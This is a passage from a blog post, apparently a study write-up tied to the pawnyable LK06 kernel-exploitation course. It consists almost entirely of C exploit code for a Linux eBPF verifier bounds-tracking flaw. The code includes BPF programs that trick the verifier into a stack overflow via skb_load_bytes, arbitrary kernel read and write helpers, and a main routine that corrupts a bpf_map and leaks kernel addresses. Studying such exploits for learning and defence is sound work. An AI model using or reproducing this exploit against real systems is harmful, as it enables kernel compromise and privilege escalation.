                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t jit_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] jit_addr: 0x%016lx\n&amp;#34;, jit_addr);

  get_enter_to_continue(&amp;#34;Press enter to exit(cause kernel crash)...&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2 id=&#34;refernece&#34;&gt;Reference&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
    </item>
    
  </channel>
</rss>
